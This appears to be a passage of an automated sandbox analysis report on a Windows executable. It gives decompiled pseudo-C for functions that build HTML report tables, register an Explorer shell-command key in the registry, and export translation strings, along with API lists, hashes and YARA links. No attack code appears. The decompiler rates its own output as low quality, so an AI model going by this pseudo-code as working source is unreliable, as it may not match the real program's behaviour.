                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C6A
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C7F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403D64
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E20
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1038210931-0
                                                                                                                                                                                                                          • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                                                                          • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                                                                                                                          0x00407763
                                                                                                                                                                                                                          0x0040776c
                                                                                                                                                                                                                          0x00407784
                                                                                                                                                                                                                          0x0040778b
                                                                                                                                                                                                                          0x00407797
                                                                                                                                                                                                                          0x00407799
                                                                                                                                                                                                                          0x0040779b
                                                                                                                                                                                                                          0x004077a7
                                                                                                                                                                                                                          0x004077ae
                                                                                                                                                                                                                          0x004077bd
                                                                                                                                                                                                                          0x004077c4
                                                                                                                                                                                                                          0x004077d3
                                                                                                                                                                                                                          0x004077da
                                                                                                                                                                                                                          0x004077e1
                                                                                                                                                                                                                          0x004077e6
                                                                                                                                                                                                                          0x004077f2
                                                                                                                                                                                                                          0x004077f5
                                                                                                                                                                                                                          0x00407804
                                                                                                                                                                                                                          0x00407805
                                                                                                                                                                                                                          0x00407810
                                                                                                                                                                                                                          0x00407812
                                                                                                                                                                                                                          0x00407813
                                                                                                                                                                                                                          0x00407818
                                                                                                                                                                                                                          0x00407818
                                                                                                                                                                                                                          0x00407825
                                                                                                                                                                                                                          0x0040782d
                                                                                                                                                                                                                          0x00407830
                                                                                                                                                                                                                          0x0040783a
                                                                                                                                                                                                                          0x00407840
                                                                                                                                                                                                                          0x00407846
                                                                                                                                                                                                                          0x00407849
                                                                                                                                                                                                                          0x00407850
                                                                                                                                                                                                                          0x0040785e
                                                                                                                                                                                                                          0x00407864
                                                                                                                                                                                                                          0x00407867
                                                                                                                                                                                                                          0x0040786b
                                                                                                                                                                                                                          0x0040786f
                                                                                                                                                                                                                          0x00407877
                                                                                                                                                                                                                          0x0040787a
                                                                                                                                                                                                                          0x00407885
                                                                                                                                                                                                                          0x00407892
                                                                                                                                                                                                                          0x004078a8
                                                                                                                                                                                                                          0x004078b8
                                                                                                                                                                                                                          0x004078c5
                                                                                                                                                                                                                          0x004078ff
                                                                                                                                                                                                                          0x004078c7
                                                                                                                                                                                                                          0x004078ca
                                                                                                                                                                                                                          0x004078dd
                                                                                                                                                                                                                          0x004078de
                                                                                                                                                                                                                          0x004078e3
                                                                                                                                                                                                                          0x004078e8
                                                                                                                                                                                                                          0x004078eb
                                                                                                                                                                                                                          0x004078f0
                                                                                                                                                                                                                          0x004078f0
                                                                                                                                                                                                                          0x00407906
                                                                                                                                                                                                                          0x00407909
                                                                                                                                                                                                                          0x0040790f
                                                                                                                                                                                                                          0x0040791d
                                                                                                                                                                                                                          0x00407923
                                                                                                                                                                                                                          0x0040792d
                                                                                                                                                                                                                          0x00407932
                                                                                                                                                                                                                          0x0040793b
                                                                                                                                                                                                                          0x00407942
                                                                                                                                                                                                                          0x00407943
                                                                                                                                                                                                                          0x0040794c
                                                                                                                                                                                                                          0x00407953
                                                                                                                                                                                                                          0x00407954
                                                                                                                                                                                                                          0x00407959
                                                                                                                                                                                                                          0x0040795c
                                                                                                                                                                                                                          0x00407961
                                                                                                                                                                                                                          0x0040796c
                                                                                                                                                                                                                          0x00407971
                                                                                                                                                                                                                          0x0040797a
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00407838
                                                                                                                                                                                                                          0x00407838
                                                                                                                                                                                                                          0x0040783a
                                                                                                                                                                                                                          0x00407980
                                                                                                                                                                                                                          0x0040798a
                                                                                                                                                                                                                          0x004079a1

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                                          • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                          			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                                                                                                                          0x00407b65
                                                                                                                                                                                                                          0x00407b7c
                                                                                                                                                                                                                          0x00407b83
                                                                                                                                                                                                                          0x00407b91
                                                                                                                                                                                                                          0x00407b98
                                                                                                                                                                                                                          0x00407ba6
                                                                                                                                                                                                                          0x00407bad
                                                                                                                                                                                                                          0x00407bb2
                                                                                                                                                                                                                          0x00407bb9
                                                                                                                                                                                                                          0x00407bca
                                                                                                                                                                                                                          0x00407bcb
                                                                                                                                                                                                                          0x00407bd6
                                                                                                                                                                                                                          0x00407bdb
                                                                                                                                                                                                                          0x00407bdc
                                                                                                                                                                                                                          0x00407be1
                                                                                                                                                                                                                          0x00407be1
                                                                                                                                                                                                                          0x00407be8
                                                                                                                                                                                                                          0x00407bf9
                                                                                                                                                                                                                          0x00407bfa
                                                                                                                                                                                                                          0x00407c05
                                                                                                                                                                                                                          0x00407c0a
                                                                                                                                                                                                                          0x00407c0b
                                                                                                                                                                                                                          0x00407c1c
                                                                                                                                                                                                                          0x00407c21
                                                                                                                                                                                                                          0x00407c21
                                                                                                                                                                                                                          0x00407c2a
                                                                                                                                                                                                                          0x00407c2b
                                                                                                                                                                                                                          0x00407c36
                                                                                                                                                                                                                          0x00407c3b
                                                                                                                                                                                                                          0x00407c3c
                                                                                                                                                                                                                          0x00407c41
                                                                                                                                                                                                                          0x00407c51
                                                                                                                                                                                                                          0x00407c56
                                                                                                                                                                                                                          0x00407c5b
                                                                                                                                                                                                                          0x00407c65
                                                                                                                                                                                                                          0x00407c68
                                                                                                                                                                                                                          0x00407c6b
                                                                                                                                                                                                                          0x00407c74
                                                                                                                                                                                                                          0x00407c7b
                                                                                                                                                                                                                          0x00407c80
                                                                                                                                                                                                                          0x00407c82
                                                                                                                                                                                                                          0x00407c88
                                                                                                                                                                                                                          0x00407ca6
                                                                                                                                                                                                                          0x00407c8a
                                                                                                                                                                                                                          0x00407c8a
                                                                                                                                                                                                                          0x00407c8b
                                                                                                                                                                                                                          0x00407c96
                                                                                                                                                                                                                          0x00407c9b
                                                                                                                                                                                                                          0x00407c9c
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407ca1
                                                                                                                                                                                                                          0x00407cb3
                                                                                                                                                                                                                          0x00407cb4
                                                                                                                                                                                                                          0x00407cbd
                                                                                                                                                                                                                          0x00407cc4
                                                                                                                                                                                                                          0x00407cc5
                                                                                                                                                                                                                          0x00407cd0
                                                                                                                                                                                                                          0x00407cd5
                                                                                                                                                                                                                          0x00407cd6
                                                                                                                                                                                                                          0x00407cdb
                                                                                                                                                                                                                          0x00407ceb
                                                                                                                                                                                                                          0x00407cf0
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00407cf3
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00407cfc
                                                                                                                                                                                                                          0x00407d00

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                          • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                                                                          • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 51%
                                                                                                                                                                                                                          			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                                                                                                                          0x00404415
                                                                                                                                                                                                                          0x0040441d
                                                                                                                                                                                                                          0x0040442c
                                                                                                                                                                                                                          0x00404435
                                                                                                                                                                                                                          0x004045b3
                                                                                                                                                                                                                          0x004045b7
                                                                                                                                                                                                                          0x004045b7
                                                                                                                                                                                                                          0x0040444b
                                                                                                                                                                                                                          0x00404452
                                                                                                                                                                                                                          0x00404457
                                                                                                                                                                                                                          0x00404460
                                                                                                                                                                                                                          0x00404461
                                                                                                                                                                                                                          0x00404462
                                                                                                                                                                                                                          0x0040446d
                                                                                                                                                                                                                          0x00404472
                                                                                                                                                                                                                          0x00404473
                                                                                                                                                                                                                          0x00404490
                                                                                                                                                                                                                          0x004044a5
                                                                                                                                                                                                                          0x004044b4
                                                                                                                                                                                                                          0x004044b6
                                                                                                                                                                                                                          0x004044b7
                                                                                                                                                                                                                          0x004044bd
                                                                                                                                                                                                                          0x004044cf
                                                                                                                                                                                                                          0x004044db
                                                                                                                                                                                                                          0x004044eb
                                                                                                                                                                                                                          0x004044f1
                                                                                                                                                                                                                          0x004044f6
                                                                                                                                                                                                                          0x004044f9
                                                                                                                                                                                                                          0x004044fe
                                                                                                                                                                                                                          0x00404506
                                                                                                                                                                                                                          0x00404507
                                                                                                                                                                                                                          0x00404508
                                                                                                                                                                                                                          0x00404510
                                                                                                                                                                                                                          0x00404521
                                                                                                                                                                                                                          0x00404532
                                                                                                                                                                                                                          0x00404539
                                                                                                                                                                                                                          0x00404547
                                                                                                                                                                                                                          0x0040454e
                                                                                                                                                                                                                          0x0040455b
                                                                                                                                                                                                                          0x0040455c
                                                                                                                                                                                                                          0x00404564
                                                                                                                                                                                                                          0x0040456f
                                                                                                                                                                                                                          0x00404570
                                                                                                                                                                                                                          0x00404571
                                                                                                                                                                                                                          0x0040457c
                                                                                                                                                                                                                          0x0040457d
                                                                                                                                                                                                                          0x00404588
                                                                                                                                                                                                                          0x00404589
                                                                                                                                                                                                                          0x0040458a
                                                                                                                                                                                                                          0x004045a0
                                                                                                                                                                                                                          0x004045a5
                                                                                                                                                                                                                          0x00404521
                                                                                                                                                                                                                          0x004044eb
                                                                                                                                                                                                                          0x004045ab
                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404452
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404473
                                                                                                                                                                                                                            • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                                                                                                                            • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004044CF
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00404539
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040454E
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404571
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                                                                                                                            • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                                                                                                                          • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                                                                                                                          • API String ID: 486436031-734527199
                                                                                                                                                                                                                          • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                                                                                                                          0x00406466
                                                                                                                                                                                                                          0x0040647d
                                                                                                                                                                                                                          0x00406484
                                                                                                                                                                                                                          0x00406499
                                                                                                                                                                                                                          0x004064a0
                                                                                                                                                                                                                          0x004064af
                                                                                                                                                                                                                          0x004064b4
